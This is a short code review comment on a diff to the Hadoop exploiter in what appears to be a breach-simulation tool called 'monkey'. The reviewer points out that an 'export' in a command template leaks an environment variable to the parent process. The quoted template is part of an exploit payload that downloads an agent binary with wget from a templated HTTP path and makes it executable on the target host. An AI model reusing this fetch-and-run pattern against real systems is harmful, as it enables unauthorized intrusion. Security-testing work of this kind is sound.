monkey/agent_plugins/exploiters/hadoop/src/hadoop_command_builder.py

```diff
@@ -35,6 +37,7 @@
     "wget --no-clobber -O %(monkey_path)s %(http_path)s "
     "|| sleep 5 && ( ( ! [ -s %(monkey_path)s ] ) && rm %(monkey_path)s ) "
     "; chmod +x %(monkey_path)s "
+    "&& export %(agent_otp_environment_variable)s=%(agent_otp)s "
```

Comment:
The word `export` here is unnecessary and undesirable. It will add the environment variable to the parent process's environment, not just the environment of the agent process.

```suggestion
    "&& %(agent_otp_environment_variable)s=%(agent_otp)s "
```